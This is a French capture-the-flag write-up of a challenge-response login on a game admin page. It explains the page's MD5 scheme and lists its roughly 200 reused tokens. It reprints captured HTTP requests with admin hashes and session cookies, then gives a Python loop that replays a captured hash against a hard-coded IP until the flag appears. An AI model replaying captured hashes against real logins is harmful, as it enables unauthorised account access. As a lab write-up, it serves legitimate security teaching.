On se retrouve avec une page web qui présente une page d'authentification. De plus, l'énoncé nous donne une capture tcp.
<html> <head> <link href="css/style.css" rel="stylesheet" type="text/css"> <title>Zombie Online Massive Game :: Admin</title> <script src="zomg.js"></script> </head> <body> <script>var zomgToken='gc4z6l8smmzhowh8rsj8wkm!!b.sf6fhf-]dlfs3';</script> <div id="login_form"> <div id="login_top"> </div> <div id="login_alert"> </div> <div id="login_fields"> <form action="" method="POST"> <label for="username">Username:</label> <input type="text" name="username" id="username"/><br/> <label for="password">Password:</label> <input type="password" name="password" id="password"/> </form> <button onclick="javascript:zomgDoAuth()" id="login_button"></button> </div> <div id="login_bottom"></div> </div> </body> </html>
/* ZOMG JS resources */ //var CryptoJS= racourcis - permet de calculer des hashs /* zomg authenticate hook */ function zomgDoAuth() { var username = document.getElementById('username').value; var password = document.getElementById('password').value; var token = zomgToken; var zomgForm = document.forms[0]; if (username.length>0 && password.length>0) { /* compute challenge answer */ var answer = CryptoJS.MD5(token+':'+username+':'+password); document.getElementById('password').value = answer; zomgForm.submit(); } }
Bref, rien de bien compliqué à comprendre sur la page. Juste avant d'envoyer le formulaire, le hash md5 du mot de passe salté avec un cookie et le pseudo est calculé, puis le formulaire est envoyé.
Le token semble aléatoire, mais il n'en est rien. En envoyant quelques requêtes, on se rend compte qu'il y a en fait environ 200 tokens différents. C'est pas énorme.
Liste des tokens
:r]x]b5bv.,5ao6weahqnaiq-e2a1nqv[3]mlsge 29.,,ndwn4ny8]qeq9m[heu=$[di$dlwozwebn.n :8,54d9=[6fehbf[m9k48p$psc8:ckh$g9!!2-q1 14ca8qf0:l=k9mg3kb31d8[quulv[vum9n78hs]p _g=4fvsi5_q6$$:pj6[,84wmzab-4[c4l7,=75.f 8!6:dl=2wfavl$d4j2hu1]9k=6,z3e,1q$2!!mj$ xhcg8p$k![kuy$_y,85gi0.toferm,8l7r[9[36_ jx,=y7c=oz553jiqs=$bc$zonxuqx-omanembq,6 jjyyb.eo-dd47,9uv7fl-03p-$=y688:heb=!lw0 l7d24cpywb81:vqht7q7zu[.emgc=]ojx3f6-ste s=h!_z!by7pwq5df-r-te:y99ljh].b=2.17]gl, 7n_pialz1h.v]1laosfeeyts.tp1j83d_i3il1z0 :_zul:$u-=]n!!sp[!9klvl]js:rsjipjm!a0!z9 ]u2t.q]g:dj0g8rs3[nw3mr-wrx]5--mpqvbvpqa c_ldo8_.q6pp4][ttu=rf]g7-gy[3q3q49w-qc[$ ,ng61jccvx-tr97:63m$vg32lm,psjfp.mtvgb$3 lzum_26073c::tr:$j[]8]2u2_ko!gxibkkar5s$ h$3va=n71i5oiwlhus=j97xggeh=3$n!e:4_e-42 8v:or.ju9ie:g:4scd7v=g3m=b-pig9j$7yu!mfy kgsqk-1ue5$z5.m.3z54m2uckemzp872me,zsvxn t9vozvrim0hnx9g0ecc0vy-8bzh_5kjpy6q,neot uv,$k$roj-ov7x,kx3a4[.rolqd[0b]0skaxp8_m !z,ns8z8v5.]2]vi9fg9[50213q:it.7y_2ms13: 1y1dk:t.65pb48gju,mej!rd1].h:$dz44vtyest u,qwmkpojm!agdozdl2jj,noq5lj[q[,g0x=:8u, tc:rq$9pv-3z:=lp]:q8agmor37m8br2mt8vbrgk f!g0g[kp,n.4wy!ul49k.]sf2hqd!ed!xjtw1tla 3c!q.h-]e2j5t1xsefj$0sroo2y-1cd5e=2i-1rx s9,,8x!sv[[]3vrbi6m9b.6k97[$$sfc$6hvqjf3 j8heb9jxjs2ecfbxe5jtjhudff-$p4xy_:f-8ncu wknxl1uff8-nyo3:nzybozq9m,6f7o=qws4mte7t x-kp3lct44qt.6fpozfjvx9er:$vz0golj!]ot2w 5bk$n$18.r.tuye6f3ey:c3.$ynvv9yfzmjl,-d- a]a3r,=-ggo3ml73d:v9i4s6r.b5j2e.v4ef-!a4 [i_,evq5],!1aubm9od6[m49:6a[=pz_gr=-wf5g -00y4ws4:kxaab-q05x[$dnb=]l5:axjo-$r1_3p -f6qohip0ql316htxo$=8lb.r[itai=b]!9j0nnw zuy0a:_ytout8x8lyq28ob4n[o2fz:v1$egvzcvn o3x]gwtrh,9nx2fu$[ac]nvbvghnw7fpvp[4.=dn 0,nyp.v]c$_881-2a4if0se4ogbco913b8p=z,07 rtukmo2x$zrj!=og4.e9xjjwo-xcygi99-cm9y4_ ro-k=]u2!:b5q-wg_xf]px3w00p_70]pd,pabwoh z,8-g9s5b4[vhs6572k33!r.9931x7i$!qizo!2h [t1:1f,5_:jvhz,ygxv]6m7mipd,j.,rna6537oo agr=twmm955=9zp4d:v8wwca0prkf67d.k_.2],$ kctd28l1wcuqc59=[g7-y,z11wo8-3ub.3_y12wo 3o40[$_]wys[xj43e!2a=6]nygl3u!sg]1twsa!i 9[zz0uu[stu=ch3o4q1eolmvu9][gk[3[0_.7v4d h3$y2q6qn3$i$m8ipk7al9x1b[fhhmvho]9:szcf 9j9sigb231!8:r9]w_6d-hban7dvpu.oda5z_fqo r4ru=-,p!xn1rj[kscx1.],qyqx_9ov0fti4su:9 gzygzo2fw3qpz_qffsj$i]h!-gt]7b6!!nx,u-px :$t2.glh4ce__3=m_79v!2ddunm7c.j-j7q2g:69 f]3p0prqe40s29-9]6nj62uxqz57mbx4d][mv8n- !m4]bakt]n4c7az,]fzv,,ce8np64mu.jazrqscf dk7nv:ttf81-z[3r!$oufp]:k3,60j[4=rj6br4o yy!2=m[w.ml7b!0[q[.aubjvt0.m1d][=_5vpuew _ycbiop6effran!$_=8[ph7w4ruoy]49zr2=o$:, 8!54zkvgh8i1:u]hz7koj]sts6eu_lensqyzv3a7 p:ixqjtafh:am7g33pr[1puyofu6q6fz=h$kcay3 y-k7j455a3yzku_xacq.$jr[v6cisr-6l34=.id8 .ze2.l=1,i1r,4q4za07hx,aninac7xln0ts8:2n !nh!08fsp33!has9ij9.a_ontgvul.l1nl=wdu79 ot2pn7gxigo58[p-qqi!ka902y5labo,dx2ppp5d ,ck4ipr0uvf4b49_0[6=$$xxz-s9f8:nzw-yu-eo s!st![i73rfyx4:1x7j,wu4]hq0p.gbf-h82[6.! [_hi-uesuhk3oqo:x:af$2dpm4l31ur]_9wk5$kd .l[nx![]2o6e=$wdflwm3puad5=:ccuf=fr6u=_r ylyok72:gi4i6[:mne]e5gv.x3lv$x72n-zd!$:$ 7:l-i9:w:m5-.s,pbe3lnwm[5aey=,p$p-vkg_4: pvfd42cx0].5y7l4]owk8vlyc!5s18j,:w10j2i[ l.y$hlvbst0,tjzi47dje-izssger!zxs-8s5a.5 742j7thyb,$![[m]hfo,egfscsyh9vetnh-7u5ig ac.bp,=8f.318q,qbrqirbct$95mcm51!a!cth,_ 1y1]r[l7_iv]t.r0[q2lzwx-mjwehwwch_p[o.!q terd2yon]klccg6.u:!uf$igk=plqq$k5gk0i$df !37d,$6hjws7yc!=]oqka__a!1p[t-s!.5u.xhm6 vd$5q=ut=013l=og16x7or1u8.d13nm65l.lg]t- 2m[=:ve=,yi:0[l2t4,fm!_ffajfxkj=$ypp$ut5 jjdi4540u:2y=]$k40sndu]$engeej6-m4_ixjkx :i6]4qf0gx5ev]rpw-yf6:uq2=g:6f.68rwp9g5w y$k=5848p3qkx_e$uv$bf:-r]4,n-5nod9cva5f7 0q9y02yrs5493$rjzkxcw8k-4sgc62ww]:qnct93 0r5l=b[j.5f2f]se8,fe_3dsxo!10a2y9[bt6-8w yq982,ou7e31fp=sacq[d_ju-iw[to8avuudvtdn !q6ji$:.=4we:=i6i-:oi0dl,ddiur6sh!i-gv$: hl8,5=[reb8-nhwzhwn3$!t4gb6i9u8q!]bi:3[_ pj8,_0ly!.br9]1c4y_4of[e4c7ziau1h4!m1upg 4.p3bkt[13wd3z2-69njv$cg8.=bf=q8t3[0z4rq ezmrfmp,39rja3r[un-!q0j[g3ngx3gpaqgob6o[ .y=7=gg02nk030nl1d[,a0z=$llc7jr[znfbefg5 hy:dajlwuv6c45e]du_[ee]4i9[n5qqpc2p-t[ye u1:ej.l5ga62:==_d,2zwhm$h9i7!qestg2qzifi jvii$cfuuft=6l5554s0hno,ma24t7jdr..4yme, t4coxr9i0n4!b0-[q:=dv8rjma1q3w921v=ed:m! 3t5ad50uod.7tz4[ly]ffrov162rn4wr:z==aws] nng46e5q$gxoth_1h.p.3sl778p=r0y_m[1h!1_u kzhf7q:1=a5,xbwc3$o17$bu9la.u38cukkbjl=v [ohien3!jekv-xsgi0jja],34,c8gdi0h5amofcp 9_g$zt_8g=y_jwx.fuo7[jgcn750[t9s8a7!!fpe 0-qhkj$,uooxpdz7t1ut1g,[tjkozuc=774ss.[- yw80mvp,1vws9zvcy1_$r9w,nw5w,bh-!$etv[a1 :ihnoe3.6d!9eica2sf:$t72ag!gmyfi9tmzaz,y 1z19mv2!6ir-5uh$_pghmuaab0r[.rjjr_sr:ozq b$]]-b!dhq,ma.hdn5s9th-_i]hixwth]u!6hx1] 4a9$r:]0k13hv5$3dia!5j]l!bx6xk0=vj:y,f71 5cnz,b6sb=jkv6daaz90xo.1i,0m5qwef]s2rrnu ,!wi8!4o4ho.opwp6ip3xh_.l75howd8xues$fsk 2f!=sgj]w=himvaiuy8$j!lmy.nnsl.-2a:up1.s 8z:1kxuxr=r6!]ivd$g-3noh0_$4vri[fznzv]4= 7xmd26r0.!l=n92emhgku04xx8]qn_bn-p,a[ioz wzluz=p5z]endxsgf4.s]3,5i:dlx$]!22fdhs.y 2-08z]2au!,tkqfobdlmq9i=8gtds13zjo9[u$xp 3nr[um$d!ylc0dfs.g3vt5o4sh5hbyu![bzl:3hp ot5al4q=yfg7-gra,9bgzn-596pm7p=up!:7twaw -fymexz,ogwk5_vvlxlv3[5c1n7j332!wgd,k2eq q8oo0uxsqqfyzlv51xt05ot:b,ngf.cu_m9:jajk leccoo[,fv3ge4djd$$uor15p4mu3860jg[z!t_j 30w52fzmc$2$mlg$z.8160=jevin$sm_ckth$8qi opcrumqmh=x3bwzchcnvj9pufs9=bnzd-[f0uw7v _,.0_[x57=a9lgcedq5bei!7dm:gt4e:8]=kbyfw $twl9c707v4xfo]=o0-ocg0r6bvs4gsc0hnr[-bp ]!552i-is47z!=c5wk,b-j6oiaj9ilf,fr$iwwz[ gak0etv]w4=]9ia_40y:6c!cgm9dfy.hixx2wfn7 3t.9jp_8e6sowc8lizb3==veruitayokd7uh5uj_ .bnq=axrl45i,mo6aiw-hgoc:e$g9d9=viz.qd7r 03e6:ygce-5:0buvdryoxngngydlyofr7nty46a7 $oz9.d0y[4en,:jk_m,o.7zd6ow0if[9777-2z:n 6sho_d-zb8sb,ew06me7exbx0ym.tmjpx[j=_wiu g,6,hcn.,pw39iez:5-wf$g_03weuv7ps!e6yxc3 z.=]-1b][p_gp[4o$gt-xj0,b7d]yh33=43-_qvp n.36!ntk0n0-gi-tlyum7irlq4-j_pp,$fa8m[r3 1a,gbc1:pdv:drol=5klk:-1.iwt-.9vwi_icot[ wgnb,,4g9h0xa08y.pu!vrn7y,ec6inrol39yn[f mpyyebj3d,zfalpwul,a7odz$kh5j,w.6ug3z.9e l2]ld=fe[q,!6sor-9_q1u29313-,5eip!j,st2! w=sx0,fp4ij54tqh7u1vl=3m90!yov[4=z0jwt.h _q$wiptmc!0gq$rojmxl]i,3jinbui0yg7x1e=_e j=$bkjl[3m-1jxg,df]9v2616]f-w4g6yxs.ktz5 4e-z86ew477[64oefzn:r:6e8xxq.inwqi8kerg0 m1u1:nmh9x809c8:98qpf.:so-7kobgmgat2lt85 :z$bpqlml[-[f:vxx,9wa5!lm1uplt_9$o2$[7:, gc4z6l8smmzhowh8rsj8wkm!!b.sf6fhf-]dlfs3 zw93aj:d_nsc]7btu4e!vdwbxsh,xkk1=--fu1l8 ,2=3vmjvcu,_ulfi903xiv,-eb3,w6nyz9kx[otq cay9i:pxmx6,a[is0xer,[[z6.$u065,b:mpyp=, 27=rigbi6s.d7$!d:.b48ev=,n,ta6e..=0n:-c0 bluz.$s1jgnl191aq.12j8rmi[l6_6l_t=o6ho:y dbzlx_=q-9,3rfo9hd$17,!sdjyixazv-:qz-gc$ rz_l,-i[64[ii.i7!b!mn2_,c]hekb]qvqwll[q1 pu]28jv22.djb!tl,lotx77$119vw$lox]q,qdm8 y41q!a.$i7n5w607.b$cwx241_cqa9$3[b!$,sov =-3bx:,ryem0zh78xwsml1bdjt-][f1n5.co$c:g v_ige$kgw04_vd1,:w8xkqttji]dhj238c9d!h.j 477he2c2umakpg.79lu,1u7j[.18ws$!y]_k3[.t 9p$w.k$._izjq2b5-2x!o]_kpmz36qd!wedby:6: fnpw8vo0fnb[n8ai4jtzsdoc00_:kz-yxeurc:c8 9k3[v_o[b10z1do9va4__5pp4l3]oscobzzk73t3 rw-p6e79pjbr-j1p29r9]6u-dgmchk=hknctgwqv yspw$2hzg]p=o$-h4z252hybrqs:ax]_l:v1[irt la=n6g7kh82zl0].ftyai2bh:5hlw-u9=j0[j0af i4grm[z8jzi_usqzlhk7y_x1s!33p.s[=..eyvrz 2ssb2j.pylijqcr6,,3s6t4i.v8,853h$_4a_q]9 t[yqb8525t:l$j4o03m2obar!s.6798f8cm1qk_f =d$1wwwsgq[5-vd93bje9233_zn$m[=kw6c!.a]o nq=lxb7-e2ro4cw_!$0]=,l[93coelr[c5ux9:eg qawb2-zp4w:i6_!5$i5w!isw[jk4_vcwnzjvwgsy ur!1fhpyt[-j$obw$z0$rp6f,$e9h1$]6utlz4mh on7x6=p6fct$:i=qpwp=f]_]_5nwa1a3-fmg:z-w x--0-dg_w2h,:a!dtqur0:keki__uqsmmsj_2beq 7[p31a:xz]i7,cs]bkysq738_i8d$v5w=3p[wd9d ,ylr1ks7ix._t8=8rsdxm]z-ngciq:t1yub-h0uv $,6q34puq,x-,wsf$cfrzf3i2g,o1$a,rzlk5oo0 oiejf!jpii1i$7:fu$lld0![,efkp=yfxz=q-3fp qz2![!wcg__69,y8zf6n:cruzl,c1]bvr:v2kfte 4a2y4u_1!z:l3:uyhe6oasux4]bgev9q[.p:qt3z f,0oe::v5029o:xupo2rn390aq=e0!t,6romx94c 9.soa]b2u:f5swhx069=pmd=y:pzr53b5p[w-1,a =-91$fc:$0r35,hm7p=8wyum:tv8cke36ok4wrvh c,y[,[$z.b:9191r.nu8lk1j6omp!x0rkk3r9mi. kq_-iryv6$j85=rs30bju17g..!6]rynf_m:ihw8 iyc:xkv]wyzm46.m4l,x=7our]w-f2$n29oagp2] .9=,hso-wz]i7t9:xx7_,,$n_fga9=3=$,9=tfj1 ]hppbkplt9]dtb=:oqcjl:3qr5[bsw958i4rq=a1 -9e,$p1vt:p4!a]3!05,cy=i_g$fethl9=y7u0,- zqf2$skn6og382q_cz5[pru]uucal,zy7vq3dlv] z]cp4q$5cll[ysy.tc!2t46a6d$is9$3nf1z-288 .iw-lw2:52p6i6-=x=hy-c_nti99n0lj[ci5-nhz ryg8k5vgb5ntjy8szc!hf,!uwv,3xszw$51=4,m7 _vt5bj.pu[i]yyx4l[xp7gey1$8et7e2mm9q2v[. ru=wt_7_[fns900pu3wncf1$hg7!_.3gan1isn9d g7:g_]5eeo,ye,v15b-9e4ky_fd!:p:8q-m$cwc$ ],-oiuflss7boq2xcxq4v76[:0=binhq_moi3c-. .y!y[y[0_v58r9]waogg5!ar25o[]xdc-hao]a9, .c$u]2uy24fc-flutzuyxo_zgx80dauls,ks4r[4 ,c77gh684$_k]c54c=kn3rkzqo14j[!typztrnza k!ihoinfa8zvhh_sah][cagr!:]qiqs_u0d7p4:h ds=f,,bmsyut7j]5q$avh,o777zno,,6]b7k,4c. 09=]e8[b2.yepq5ukgp8wo197rkrh22l4,idqrc] .jhjk!.z4qoj8m6oeobun:,a7ygw-se$c9uy3cqt
La capture TCP referme une session TCP sur le site en question. On y trouve deux requêtes HTTP différentes, ainsi qu'une réponse.
POST / HTTP/1.1 Host: public.nuitduhack.com:8009 Origin: http://public.nuitduhack.com:8009 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/3.4.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://public.nuitduhack.com:8009/ Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SESS0a1ee27932bc06da50674c8c14a5e20b=8qf3fbobdbfrs2g1vs6s1gokc5; SESS2c1a862b4fab9ef42a74fc1be0892571=r4slnc7qd9ihg8tnau1telej60; __utma=114525464.2112388856.1338920171.1340047390.1340053513.8; __utmz=114525464.1340047390.7.2.utmcsr=t.co|utmccn=(referral)|utmcmd=referral|utmcct=/dhGNVGsO; PHPSESSID=2l0loe6li4feofjscuu32ohb54 Content-Length: 56 username=admin&password=1349e61e13325795c02ad26b0ab53dda
POST / HTTP/1.1 Host: public.nuitduhack.com:8009 Origin: http://public.nuitduhack.com:8009 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/3.4.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://public.nuitduhack.com:8009/ Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SESS0a1ee27932bc06da50674c8c14a5e20b=8qf3fbobdbfrs2g1vs6s1gokc5; SESS2c1a862b4fab9ef42a74fc1be0892571=r4slnc7qd9ihg8tnau1telej60; __utma=114525464.2112388856.1338920171.1340047390.1340053513.8; __utmz=114525464.1340047390.7.2.utmcsr=t.co|utmccn=(referral)|utmcmd=referral|utmcct=/dhGNVGsO; PHPSESSID=2l0loe6li4feofjscuu32ohb54 Content-Length: 56 username=admin&password=39d7720343ac3430570f202dde3ab803
Nous avons environ 200 tokens. On possède aussi deux hashs. L'un deux doit probablement correspondre au mot de passe à trouver. On se met donc à brute forcer. Après avoir attendu un bon moment, on commence à se poser des questions. C'est visiblement pas la solution.
Toujours avec nos 200 tokens… Finalement, si on envoie des requêtes avec notre mot de passe hashé et notre login qui vont bien (ceux récupérés dans la capture), on va finir par tomber sur le bon token! Hop hop hop, on code ça, et on laisse tourner environ 2 minutes… Et là, oh magie, on obtient le flag :)
#!/usr/bin/env python # encoding: utf-8 import httplib def main(): headers = {"Cookie":"PHPSESSID=9p22omkei1cb5517kk93s5ql53;", "Content-Type":"application/x-www-form-urlencoded"} while True: conn = httplib.HTTPConnection("54.247.160.116:8009") conn.request("POST","/","username=admin&password=39d7720343ac3430570f202dde3ab803",headers) rep = conn.getresponse().read() if rep.count("Flag") > 0: print rep break if __name__ == '__main__': main()
<html> <head> <link href="css/style.css" rel="stylesheet" type="text/css"> <title>Zombie Online Massive Game :: Admin</title> <script src="zomg.js"></script> </head> <body> <div id="login_form"> <div id="login_top"> </div> <div id="login_alert"> Flag: 8f5741fe00598d1463773708f5743285 </div> <div id="login_bottom"></div> </div> </body> </html>